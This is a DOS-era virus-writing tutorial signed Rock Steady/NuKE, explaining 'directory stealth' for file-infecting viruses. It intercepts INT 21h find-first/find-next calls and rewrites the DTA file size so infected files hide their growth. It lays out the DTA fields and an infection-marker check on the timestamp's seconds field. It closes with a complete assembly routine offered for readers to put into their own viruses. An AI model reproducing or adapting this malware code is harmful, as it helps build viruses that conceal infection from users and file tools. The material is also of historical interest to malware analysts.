*******************************     
                  **   Dir Stealth Method 2    **                            
                  **                           **                            
                  **    By Rock Steady/NuKE    **
                  *******************************

 Some May notice that when they use PCTOOLs (aka PCSHELL) or Peter Norton  
 Utilities, or *SOME* File Managing systems like DOS-Shell, the File       
 increase of infected files is know visable. There is no doubt about       
 it, if you only put Method #1 in your virus you will encounter times      
 were the file increase shows. Its not because your Routine isn't good!    
 But due to the fact that there is another way to Read the Dir Listing     
 by DOS. An this method is Call File-find by ASCIIZ format.                
                                                                           
 We just learned how to edit File-Find by FCB. Which is used by MS-DOS     
 PC-DOS and some other programs. But unlike the others, they use the       
 ASCIIZ file-Find method as it is EASIER to open, close, edite, and any    
 other file access routine is ALOT easier with the ASCIIZ or (File Handle) 
 system. So we will make our Virus Stealth to Method #2! Making us 100%    
 Stealth from file-finds...                                                
                                                                           
 The Function we have to Intecept is Interrupt 21h, with Functions         
 AH=4Eh (Find First Matching File) and AH=4F (Find Next Matching File)     
 The Way to go about it is Very much ALIKE to the first one, so just       
 understand the thoery, and you'll be able to program it within            
 seconds.                                                                  
                                                                           
 When this function is called, it will fill the current DTA with 12        
 entries totally 43 bytes. The DTA will be set up as follows: (below)      
 BTW: DTA is only a place DOS uses to do Disk Transfer Areas! It ISN'T     
      like the FCB, or PSP that is anyways the same! You can play with     
      this as you wish. You also use this DTA to read the Command Line     
      Parameters...etc...                                                  
                                                                           
  Offset Size            Description                                       
   DDDDDEDDDDEDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD                   
    00h 3 1  3 Drive Letter                                                
    01h 3 11 3 Seach Template (Eg:????????COM)                             
    0Ch 3 1  3 Attribute Search                                            
    0Dh 3 2  3 Entry count within Directory                                
    0Fh 3 2  3 Cluster Number of start of parent directory                 
    11h 3 4  3 Reserved (Atleast Undocumented)                             
    15h 3 1  3 Attribute of File FOUND                                     
  @ 16h 3 2  3 File's Time  (Bits : SSSS-SMMM-MMMH-HHHH) Sec/2:Month:Year  
    18h 3 2  3 File's Date  (Bits : DDDD-DMMM-MYYY-YYYY) Day:Month:Year    
  * 1Ah 3 4  3 File's Size (Word Reverse Order, Dah!!?!)                   
    1Eh 3 13 3 ASCIIZ File name & Extension                                
  * = Must be Edited by Virus is File Infected                             
  @ = Needed to Check if File is Infected. (Seconds Field)                 
                                                                           
  %Algorthm%                                                               
  ~~~~~~~~~~                                                               
     CONDISTION: DS:DX points to ASCIIZ of file search.                    
                 CX: Contains File Attributes                              
                                                                           
         Step 1. Call Dos so it fills the DTA with its findings            
         Step 2. Test for CF=1 (Carry Flag) as error happened              
                 errors happen if File not found, no more files etc...     
         Step 3. Get Seconds Field And UnMask Seconds                      
         Step 4. Check if seconds = 58 (What ever your using) Quit if NOT  
                 Notice we use `XOR  AL,1Dh' rather than `CMP   AL,1Dh'    
                 Check in your ASM Bible, which is Faster? Size?           
                 Remember speed & size is EVERYTHING, That is why          
                 My lastest are quite small viriis for stealthness!!       
         Step 5. If Infected Subtract Virus Size from File                 
         Step 6. Quit                                                      
                                                                           
 ;This is the routine. once you get AH=4Eh/4Fh in you Int 21h Call this    
 ;Routine...  (Look at Method #1 for Int21h handler)                       
 Dir_Stealth2                                                              
         pushf                        ;Fake an Int Call                    
         push    cs                   ;Save our location                   
         call    int21Call            ;Step #1                             
         jc      no_good              ;Error Split                         
         push    ax                                                        
         push    bx                                                        
         push    es                                                        
         mov     ah,51h               ;Get Current DTA                     
         int     21h                  ;ES:BX --> DTA                       
                                                                           
         mov     ax,es:[bx+16h]       ;Get File Time                       
         and     ax,1fh               ;Un Mask Seconds field               
         xor     al,1dh               ;Is it 58 Seconds?                   
         jnz     not_infected         ;Not infected! Dah?                  
         sub     es:[bx+1Ah],Virus_Size ;Minus Virus Size!                 
         sbb     es:[bx+1Ch],0          ;Fix up the Sub, Carrying!         
 not_infected:                                                             
         pop     es                                                        
         pop     bx                   ;Restore Registers                   
         pop     ax                                                        
 no_Good:iret                                                              
 ; This code WORKS and is also 100% (c) Rock Steady / NuKE                 
 ;--------------------------EnD-------------------------------             
                                                                           
                            Rock Steady                                    
         `WaTch OuT WaReZ PuPpiEs NuKE PoX V2.0 WiLl GeTcHa'